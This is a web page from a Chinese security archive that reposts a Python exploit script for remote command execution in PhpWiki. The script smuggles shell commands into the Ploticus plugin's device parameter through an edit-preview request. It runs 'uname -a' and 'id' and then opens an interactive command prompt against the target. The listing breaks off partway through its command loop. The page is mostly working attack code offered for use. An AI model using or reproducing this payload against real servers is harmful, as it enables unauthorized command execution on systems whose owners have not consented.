首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PhpWiki - Remote Command Execution
来源:vfocus.net 作者:Harris 发布时间:2014-08-29  
###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################
  
import urllib
import urllib2
import sys
def banner():
    print "     ____                    __                  _ __   _ "
    print "    / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
    print "   / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
    print "  / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
    print " /_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
    print "              /_/ /_/         /_/                     \n"
  
  
def usage():
    banner()
    print " [+] Usage example"
    print " [-] python " + sys.argv[0] + " http://path.to/wiki"
  
if len(sys.argv)< 2:
    usage()
    quit()
  
domain = sys.argv[1]
def commandexec(cmd):
    data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    cmd2 = urllib2.urlopen(cmd1)
    output = cmd2.read()
    firstloc = output.find("123:::\n") + len("123:::\n")
    secondloc = output.find("\n:::123")
    return output[firstloc:secondloc]
  
  
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
    cmd = raw_input('Run a command: ')
    if cmd == 'quit':
        print "[-] Hope you had fun :)"
        quit = 1
    if cmd != 'quit':

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ActualAnalyzer Lite 2.81 - Una
·XRMS - Blind SQL Injection and
·Plogger 1.0-RC1 - Authenticate
·NRPE 2.15 Remote Command Execu
·Internet Explorer MS14-029 Mem
·HTML Help Workshop 1.4 - (SEH)
·Firefox WebIDL Privileged Java
·IBM 1754 GCM KVM Multiple Vuln
·glibc Off-by-One NUL Byte gcon
·Baidu Spark Browser v26.5.9999
·Grand MA 300 Fingerprint Reade
·Wing FTP Server Authenticated
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved